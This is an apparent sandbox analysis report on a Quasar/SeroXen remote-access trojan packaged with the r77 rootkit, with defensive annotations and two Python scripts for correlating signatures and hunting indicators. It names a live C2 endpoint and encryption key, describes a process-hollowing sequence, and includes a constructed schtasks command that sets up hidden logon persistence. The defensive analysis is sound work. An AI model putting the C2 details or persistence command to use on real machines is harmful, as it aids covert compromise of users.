Analysis
max time kernel: 1800s
max time network: 1504s
platform: windows11-21h2_x64
resource: win11-20240419-en
resource tags: arch:x64, arch:x86, image:win11-20240419-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 11/05/2024, 08:37
General
Target: Uni.exe
Size: 409KB
MD5: 4c2bb0618a6eda615c8001d5a7ccd6c0
SHA1: c88d2c8bfc5906a5cfef78893d1132edcffd71f0
SHA256: abcda524c02f9381d8d43f9ec0079d854db821d77f45e88f50606f46871f81d6
SHA512: 6abe53339656a023e2a0547f1c2249789c33091d67a21f2e689c6411dc5357e34ec3c65634b6f6955a5023d20803f7c746b13f574bcd84b008abb4a97ea61027
SSDEEP: 12288:rpg6M1i1v6q1ak/e7xlX7nnvGAwhJLJO:lxqiii6xlLvGjhO
Malware Config
Extracted
family: quasar
version: 3.1.5
campaign / client tag: SeroXen
c2: tue-jake.gl.at.ply.gg:29058
mutex: $Sxr-xPAuDxLNyBmZ7S2WLJ
encryption_key: Pw78RUs175dFrKD7lMwH
install_name: Client.exe
log_directory: Logs
reconnect_delay: 3000
startup_key: SeroXen
subdirectory: SubDir

The SeroXen tag, the $Sxr- mutex prefix and the SeroXen startup key mark this as a SeroXen build of Quasar rather than a stock 3.1.5 client. The C2 is a *.gl.at.ply.gg hostname, which is a playit.gg tunnel endpoint: the name resolves to the tunnel provider, not to the operator's own host, so block and alert on the full hostname and port rather than on whichever IP it resolved to during this run. reconnect_delay is in milliseconds (3 s between reconnect attempts). The config gives the install subdirectory and file name (SubDir\Client.exe) but not the parent directory, so on-disk hunts should match on that path tail.
Signatures

Quasar payload (2 IoCs)
yara rule family_quasar matched on:
  behavioral1/memory/3584-1-0x0000000000390000-0x00000000003FC000-memory.dmp  (memory of PID 3584)
  behavioral1/files/0x001a00000002ab3b-11.dat  (dropped file)

Suspicious use of NtCreateProcessExOtherParentProcess (1 IoC)
  PID 2304 (WerFault.exe) created a process with PID 2184 as its parent  [procid_target 128]

Suspicious use of NtCreateUserProcessOtherParentProcess (4 IoCs)
  PID 2572 (powershell.EXE) created a process with PID 632 as its parent  [procid_target 5]
  PID 908 (powershell.EXE) created a process with PID 632 as its parent  [procid_target 5]
  PID 3804 (powershell.EXE) created a process with PID 632 as its parent  [procid_target 5]
  PID 4636 (svchost.exe) created a process with PID 2184 as its parent  [procid_target 128]
The two rows naming PID 2184 are ordinary Windows Error Reporting behaviour: the WER service (hosted in svchost.exe) starts WerFault.exe with the faulting process set as its parent, which trips this signature in almost every run where something crashes. The three powershell.EXE rows are the ones to follow up: three separate PowerShell instances each spawn a child under the same foreign parent (PID 632, target index 5 in every row, so it is one reused parent and not three different children), and the same three PIDs reappear in the SetThreadContext table below.

Executes dropped EXE (5 IoCs)
  PID 4132  Client.exe
  PID 4416  install.exe
  PID 2812  install.exe
  PID 656   tUCkOmZwRnsY.exe
  PID 2156  install.exe
Client.exe is the install_name from the extracted config; tUCkOmZwRnsY.exe is the binary dropped to the user's Temp directory that later shows up in the audio PolicyConfig entry further down.

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 4 IoCs)
  flows 10, 25, 1 and 4: raw.githubusercontent.com

Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow 1: ip-api.com
Drops file in System32 directory (19 IoCs)
  File opened for modification  C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx  svchost.exe
  File opened for modification  C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506  svchost.exe
  File opened for modification  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive  powershell.EXE
  File opened for modification  C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx  svchost.exe
  File opened for modification  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml  OfficeClickToRun.exe
  File opened for modification  C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187  svchost.exe
  File opened for modification  C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749  svchost.exe
  File opened for modification  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive  powershell.EXE
  File opened for modification  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log  powershell.EXE
  File opened for modification  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive  powershell.EXE
  File opened for modification  C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157  svchost.exe
  File opened for modification  C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506  svchost.exe
  File opened for modification  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\V01.chk  DllHost.exe
  File opened for modification  C:\Windows\System32\Tasks\$77Client.exe  svchost.exe
  File opened for modification  C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx  svchost.exe
  File opened for modification  C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187  OfficeClickToRun.exe
  File opened for modification  C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187  OfficeClickToRun.exe
  File opened for modification  C:\Windows\System32\Tasks\$77svc64  svchost.exe
  File opened for modification  C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Privacy-Auditing%4Operational.evtx  svchost.exe
Two of these entries are the sample's persistence; the rest (event logs, CryptnetUrlCache, Office Click-to-Run, WebCache) are OS housekeeping. C:\Windows\System32\Tasks\$77Client.exe and C:\Windows\System32\Tasks\$77svc64 are scheduled-task definitions written by the Task Scheduler service, which runs inside svchost.exe, which is why svchost.exe rather than schtasks.exe is recorded as the writer. The $77 prefix is the naming convention of the r77 rootkit, which hides files, processes, registry keys and scheduled tasks whose names start with it, and $77svc64 is the task name r77 uses for its PowerShell stager; SeroXen is Quasar packaged with r77. The powershell.EXE entries land under C:\Windows\system32\config\systemprofile, so those PowerShell instances were running as SYSTEM.
Suspicious use of SetThreadContext (3 IoCs)
  PID 2572 (powershell.EXE) set thread context of PID 2600  [procid_target 94]
  PID 908 (powershell.EXE) set thread context of PID 4876  [procid_target 95]
  PID 3804 (powershell.EXE) set thread context of PID 4800  [procid_target 125]
Each of the three SYSTEM-level powershell.EXE processes from the parent-spoofing table above rewrites the thread context of exactly one other process. Taken together with the spoofed-parent creations this is the sequence of process hollowing: create a child suspended, replace its image, SetThreadContext, resume.
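The three process tables above arrive flattened into single lines in this export. The following Python, added here and not part of the tria.ge report, parses those rows back into records and correlates them, so that a PID which both spawns a child under a foreign parent and then sets another process's thread context is surfaced as a hollowing candidate. The sample input is the row text copied verbatim from the tables above; the column semantics (second PID is the claimed parent for the *OtherParentProcess signatures, the thread owner for SetThreadContext) follow from the rows themselves, since PID 632 recurs across three different actors and so cannot be a child PID.

```python
import re
from collections import defaultdict

# Row text copied verbatim from the three signature tables in this report.
RAW_ROWS = {
    "NtCreateProcessExOtherParentProcess":
        "PID 2304 created 2184 2304 WerFault.exe 128",
    "NtCreateUserProcessOtherParentProcess":
        "PID 2572 created 632 2572 powershell.EXE 5 "
        "PID 908 created 632 908 powershell.EXE 5 "
        "PID 3804 created 632 3804 powershell.EXE 5 "
        "PID 4636 created 2184 4636 svchost.exe 128",
    "SetThreadContext":
        "PID 2572 set thread context of 2600 2572 powershell.EXE 94 "
        "PID 908 set thread context of 4876 908 powershell.EXE 95 "
        "PID 3804 set thread context of 4800 3804 powershell.EXE 125",
}

# Each row reads: "PID <actor> <verb> <other> <actor again> <actor image> <procid_target>".
# <other> is the PID claimed as parent for the *OtherParentProcess signatures and the
# process whose thread was rewritten for SetThreadContext.
ROW_RE = re.compile(
    r"PID (?P<actor>\d+) (?P<verb>created|set thread context of) (?P<other>\d+) "
    r"(?P<actor2>\d+) (?P<image>\S+) (?P<target_idx>\d+)"
)


def parse_rows(signature, text):
    """Split one flattened signature table into a list of row dicts."""
    rows = []
    for m in ROW_RE.finditer(text):
        if m["actor"] != m["actor2"]:
            raise ValueError(f"malformed row in {signature}: {m.group(0)}")
        rows.append({
            "signature": signature,
            "actor": int(m["actor"]),
            "verb": m["verb"],
            "other": int(m["other"]),
            "image": m["image"],
            "target_idx": int(m["target_idx"]),
        })
    return rows


def parse_all(raw=RAW_ROWS):
    return [row for sig, text in raw.items() for row in parse_rows(sig, text)]


def hollowing_candidates(rows):
    """Actor PIDs seen both spawning under a foreign parent and rewriting a thread context."""
    verbs = defaultdict(set)
    for r in rows:
        verbs[r["actor"]].add(r["verb"])
    return sorted(pid for pid, v in verbs.items()
                  if {"created", "set thread context of"} <= v)


def spoofed_parents(rows):
    """Map each claimed parent PID to the set of actor images that used it."""
    out = defaultdict(set)
    for r in rows:
        if r["verb"] == "created":
            out[r["other"]].add(r["image"])
    return dict(out)


def injection_targets(rows):
    """Map actor PID -> PID whose thread context it set."""
    return {r["actor"]: r["other"] for r in rows if r["verb"] == "set thread context of"}


if __name__ == "__main__":
    rows = parse_all()
    print(f"{len(rows)} rows parsed")
    print("hollowing candidates:", hollowing_candidates(rows))
    print("spoofed parents:", spoofed_parents(rows))
    print("injection targets:", injection_targets(rows))
```

Run against this report it returns 908, 2572 and 3804 as hollowing candidates, PID 632 as the parent shared by all three PowerShell instances, and 2184 as the parent used only by WerFault.exe and svchost.exe, which separates the WER noise from the sample's activity without looking at a process tree.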
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Checks processor information in registry (2 TTPs, 7 IoCs)
Processor information is often read in order to detect sandboxing environments.
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier  WerFault.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1  WerFault.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision  WerFault.exe
  Key opened  \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0  WerFault.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz  WerFault.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  WerFault.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier  WerFault.exe
Every one of these reads was made by WerFault.exe, which collects CPU details for its crash report. They are a side effect of the crash handled in the WerFault rows above, not evidence of anti-sandbox checks by the sample or its dropped executables.

Creates scheduled task(s) (1 TTP, 4 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
  PID 5104  SCHTASKS.exe
  PID 4424  schtasks.exe
  PID 2036  SCHTASKS.exe
  PID 2132  schtasks.exe
Four invocations, two task definitions on disk ($77Client.exe and $77svc64 under C:\Windows\System32\Tasks). Check each schtasks PID's parent in the process tree to see which dropped binary registered which task.
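The extracted config and the persistence artefacts above together give enough to hunt with. The Python below is an added example, not part of the tria.ge report or of Quasar: it derives match keys from the config values printed in the Malware Config block (C2 host and port, the SubDir\Client.exe path tail, the SeroXen startup key) and the $77 task-name prefix seen under System32\Tasks, then runs them over Sysmon-style process, file and network events. The event records, including the schtasks command line and the Roaming\SubDir install directory, are constructed for the example; the report does not show the command lines or the install parent directory.

```python
"""Hunt for this report's Quasar/SeroXen artefacts in Sysmon-style telemetry."""
import re

# Values copied from the report's Malware Config block.
QUASAR_CONFIG = {
    "c2": "tue-jake.gl.at.ply.gg:29058",
    "mutex": "$Sxr-xPAuDxLNyBmZ7S2WLJ",
    "install_name": "Client.exe",
    "subdirectory": "SubDir",
    "startup_key": "SeroXen",
}
# Name prefix of the two task files the report shows under C:\Windows\System32\Tasks.
HIDDEN_PREFIX = "$77"
# The IP lookup service contacted in this run.
IP_LOOKUP_HOSTS = {"ip-api.com"}


def iocs_from_config(cfg):
    """Derive match keys; the install parent directory is not in the config, so match the tail."""
    host, port = cfg["c2"].rsplit(":", 1)
    return {
        "c2_host": host.lower(),
        "c2_port": int(port),
        "install_tail": (cfg["subdirectory"] + "\\" + cfg["install_name"]).lower(),
        "startup_key": cfg["startup_key"],
        "mutex": cfg["mutex"],
    }


def match_event(ev, iocs):
    """Return the reasons one telemetry event matches; an empty list means no hit."""
    reasons = []
    if ev["type"] == "net":
        host = ev["dst_host"].lower()
        if host == iocs["c2_host"] and ev["dst_port"] == iocs["c2_port"]:
            reasons.append("connection to configured C2 host:port")
        if host in IP_LOOKUP_HOSTS:
            reasons.append("external IP lookup web service")
    elif ev["type"] == "file":
        path = ev["path"].lower()
        name = path.rsplit("\\", 1)[-1]
        if "\\system32\\tasks\\" in path and name.startswith(HIDDEN_PREFIX.lower()):
            reasons.append("task file with $77 hidden-prefix name")
        if path.endswith(iocs["install_tail"]):
            reasons.append("write to Quasar install path")
    elif ev["type"] == "process":
        cmd = ev["cmdline"]
        if ev["image"].lower().endswith("schtasks.exe") and re.search(r"/create\b", cmd, re.I):
            reasons.append("schtasks /create")
            if iocs["startup_key"] in cmd or HIDDEN_PREFIX in cmd:
                reasons.append("task name carries SeroXen startup key or $77 prefix")
    return reasons


def scan(events, iocs):
    """Return [(event index, reasons)] for every event that matched at least one rule."""
    hits = []
    for i, ev in enumerate(events):
        reasons = match_event(ev, iocs)
        if reasons:
            hits.append((i, reasons))
    return hits


IOCS = iocs_from_config(QUASAR_CONFIG)

# Constructed telemetry (not from the sandbox run): half mirrors the report, half is benign.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /create /tn "$77Client.exe" /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /sc onlogon /rl highest /f'},
    {"type": "file", "path": r"C:\Windows\System32\Tasks\$77svc64"},
    {"type": "file", "path": r"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"},
    {"type": "net", "dst_host": "tue-jake.gl.at.ply.gg", "dst_port": 29058},
    {"type": "net", "dst_host": "ip-api.com", "dst_port": 80},
    # abused in this run but not flaggable by hostname alone
    {"type": "net", "dst_host": "raw.githubusercontent.com", "dst_port": 443},
    {"type": "process", "image": r"C:\Windows\System32\schtasks.exe", "cmdline": "schtasks.exe /query /fo LIST"},
    {"type": "file", "path": r"C:\Windows\System32\Tasks\MicrosoftEdgeUpdateTaskMachineCore"},
]

if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_EVENTS, IOCS):
        print(idx, SAMPLE_EVENTS[idx]["type"], "->", "; ".join(reasons))
```

The raw.githubusercontent.com flow deliberately produces no hit: a legitimate hosting domain is only an indicator together with the requesting process and URL path, which this report does not give, so it is left to the analyst rather than turned into a blanket rule. The $77 rule matches on the task file name rather than on schtasks.exe alone because r77 hides the task from the scheduler UI once loaded; the file under System32\Tasks is still written first.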
Enumerates system info in registry (2 TTPs, 5 IoCs)
  Key opened  \REGISTRY\MACHINE\Hardware\Description\System\BIOS  WerFault.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU  WerFault.exe
  Key opened  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS  msedge.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer  msedge.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName  msedge.exe
All five reads come from WerFault.exe and msedge.exe, not from the sample or its dropped executables.

(untitled signature table)
  Key created  \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\11ef2c29_0  svchost.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\11ef2c29_0\ = "{2}.\\\\?\\hdaudio#func_01&ven_1af4&dev_0022&subsys_1af40022&rev_1001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\\elineouttopo/00010001|\\Device\\HarddiskVolume2\\Users\\Admin\\AppData\\Local\\Temp\\tUCkOmZwRnsY.exe%b{00000000-0000-0000-0000-000000000000}"  svchost.exe
The audio-endpoint PropertyStore value names \Device\HarddiskVolume2\Users\Admin\AppData\Local\Temp\tUCkOmZwRnsY.exe, the dropped executable from the "Executes dropped EXE" table, as the audio session client; the write itself is performed by the audio service in svchost.exe on that client's behalf.
Modifies data under HKEY_USERS (64 IoCs)
  Key created  \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections  svchost.exe
  Key deleted  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe  OfficeClickToRun.exe
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common  OfficeClickToRun.exe
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL  svchost.exe
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust  powershell.EXE
  Key deleted  \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR  OfficeClickToRun.exe
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs  powershell.EXE
  Set value (str)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"  OfficeClickToRun.exe
  Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor  OfficeClickToRun.exe
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs  powershell.EXE
  Key deleted  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor  OfficeClickToRun.exe
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry  OfficeClickToRun.exe
  Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0  OfficeClickToRun.exe
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata  OfficeClickToRun.exe
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates  powershell.EXE
  Set value (str)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"  OfficeClickToRun.exe
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates  powershell.EXE
  Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs  powershell.EXE
The SystemCertificates keys are created, not populated: they are the empty certificate-store hives that .NET and PowerShell lay down under HKEY_USERS\.DEFAULT the first time a certificate lookup runs in the SYSTEM profile. Their presence is further evidence that powershell.EXE ran as SYSTEM (consistent with the systemprofile paths in the System32 drops), not evidence of certificate tampering. The Office Click-to-Run telemetry and svchost.exe entries are unrelated background activity.
Modifies registry class (40 IoCs)
Every writer in this table is RuntimeBroker.exe, Explorer.EXE or ScreenClippingHost.exe updating ContentDeliveryManager's staged-asset bookkeeping; none of the sample's processes appear, so the table is sandbox background noise. The two long hex values are Windows shell link (.lnk) structures: the C:\Users\Admin\AppData\Local\Packages\...\StagedAssets\<hash> path is readable as ASCII and UTF-16 inside each blob and matches the neighbouring (str) value.
  Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\  Explorer.EXE
  Key created  \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\93a8784b-5fe7-41e7  RuntimeBroker.exe
  Set value (int)  \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\93a8784b-5fe7-41e7 = "0"  RuntimeBroker.exe
  Set value (int)  \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc72a060-adef-4519 = "8324"  RuntimeBroker.exe
  Set value (int)  \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc72a060-adef-4519 = "0"  RuntimeBroker.exe
  Key created  \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\MuiCache  ScreenClippingHost.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\15ebb458-1dd8-4c7f  RuntimeBroker.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\15ebb458-1dd8-4c7f = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"  RuntimeBroker.exe
  Set value (int)  \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\93a8784b-5fe7-41e7 = "8324"  RuntimeBroker.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\93a8784b-5fe7-41e7 = "\\\\?\\Volume{E9075ED3-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\3f8be388a6e5d5acd16bab84d000b62642e0ed51d2c81a8c6f3d4368ea05250f"  RuntimeBroker.exe
